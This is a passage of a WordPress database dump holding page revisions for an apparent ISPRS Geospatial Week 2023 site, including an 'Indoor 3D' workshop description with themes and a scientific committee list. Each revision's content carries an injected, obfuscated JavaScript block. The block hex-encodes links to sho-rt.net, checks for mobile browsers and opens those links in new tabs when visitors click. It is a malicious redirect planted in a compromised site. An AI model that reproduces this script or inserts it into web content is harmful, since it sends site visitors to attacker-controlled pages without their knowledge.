_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Robotics for Mapping - SLAM approaches for mobile mapping and robot intelligence','','inherit','closed','closed','','2570-revision-v1','','','2022-10-07 21:17:35','2022-10-07 21:17:35','',2570,'https://gsw2023.com/?p=2596',0,'revision','',0),
(2597,1,'2022-10-07 21:20:28','2022-10-07 21:20:28','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2587\" img_size=\"200x75\"][/vc_column][vc_column width=\"3/4\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Indoor 3D','','inherit','closed','closed','','2586-revision-v1','','','2022-10-07 21:20:28','2022-10-07 21:20:28','',2586,'https://gsw2023.com/?p=2597',0,'revision','',0),
(2598,1,'2022-10-07 21:31:27','2022-10-07 21:31:27','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2587\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>The workshop <em>Indoor 3D 2023</em> is the latest in the series of workshops dedicated to research and developments in the area of indoor spatial information. It aims to bring together researchers, professionals and users from the academia and industry involved in indoor mapping, 3D modeling, navigation, location-based services (LBS) and mobility. Papers addressing the following topics are welcomed (but not limited to): seamless Indoor/outdoor/underground 3D modelling, autonomous navigation in indoor/outdoor environments, Location-based services in indoor environments, indoor pedestrian tracking and trajectory prediction, disaster management in indoor/underground environments, indoor/outdoor scene understanding, machine/deep learning for indoor modelling, indoor virtual/augmented reality, indoor mobility and assistive technologies, etc. This workshop will be part of the ISPRS Geospatial Week 2023 and will be organized by the ISPRS Working Group IV/4, in cooperation with ISPRS WG IV/7.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"42\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:purple;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Seamless indoor/underground/outdoor 3D modelling and mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Stationary and dynamic obstacle detection</strong></h6>\n</li>\n<li>\n<h6><strong>Multisensory fusion for indoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Eye-tracking and body sensors in indoor 3D research</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor localization and route planning for disaster management</strong></h6>\n</li>\n<li>\n<h6><strong>Navigation, orientation and accessibility augmentation in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>LBS in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative LBS systems and applications</strong></h6>\n</li>\n<li>\n<h6><strong>Aided mobility for disabled/aged people</strong></h6>\n</li>\n<li>\n<h6><strong>Disaster prevention, analysis and management in indoor/underground environments</strong></h6>\n</li>\n<li>\n<h6><strong>Smart facility maintenance</strong></h6>\n</li>\n<li>\n<h6><strong>Spatio-temporal data modelling, analysis of movement traces</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor location-linked big data</strong></h6>\n</li>\n<li>\n<h6><strong>SLAM methods in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic parsing in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Visualization techniques for LBS in indoor/outdoor seamless environments</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor virtual/augmented reality</strong></h6>\n</li>\n<li>\n<h6><strong>Human environment interactions in mobility context</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-task collaboration for Indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor/outdoor scene understanding</strong></h6>\n</li>\n<li>\n<h6><strong>Machine/deep learning for indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Mobility and assistive technologies</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic indoor/underground/outdoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Multimodal mobility for people with specific needs</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:purple;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Dev Raj Paudyal, University of Southern Queensland</strong></h6>\n</li>\n<li>\n<h6><strong>Berk Anbaroğlu, Geomatics Engineering Dept. of Hacettepe University</strong></h6>\n</li>\n<li>\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria</strong></h6>\n</li>\n<li>\n<h6><strong>Gerhard Navratil, Technischen Universität Wien</strong></h6>\n</li>\n<li>\n<h6><strong>Kourosh Khoshelham, University of Melbourne</strong></h6>\n</li>\n<li>\n<h6><strong>Victor N. Sunday, University of Port Harcourt,</strong></h6>\n</li>\n<li>\n<h6><strong>Chenglu Wen, Xiamen University</strong></h6>\n</li>\n<li>\n<h6><strong>Yiping Chen, Sun Yat-sen University</strong></h6>\n</li>\n<li>\n<h6><strong>Ville Lehtola,  University of Twente</strong></h6>\n</li>\n<li>\n<h6><strong>Ruofei Zhong, Capital Normal University</strong></h6>\n</li>\n<li>\n<h6><strong>Yongze Song, Curtin University</strong></h6>\n</li>\n<li>\n<h6><strong>Abdoulaye Diakité, The University of New South Wales</strong></h6>\n</li>\n<li>\n<h6><strong>David  Sánchez Rodríguez, University of Las Palmas de Gran Canaria</strong></h6>\n</li>\n<li>\n<h6><strong>Pawel Boguslawski, University of the West of England (UK),</strong></h6>\n</li>\n<li>\n<h6><strong>Umit Isikdag, Mimar Sinan Fine Arts University (Turkey)</strong></h6>\n</li>\n<li>\n<h6><strong>Mohsen Kalantari, Melbourne School of Engineering</strong></h6>\n</li>\n<li>\n<h6><strong>Juntao Yang, Shandong University of Science and Technology</strong></h6>\n</li>\n<li>\n<h6><strong>Hao Cheng, Leibniz Universität Hannover</strong></h6>\n</li>\n<li>\n<h6><strong>Lei Niu, Lanzhou Jiaotong University</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else 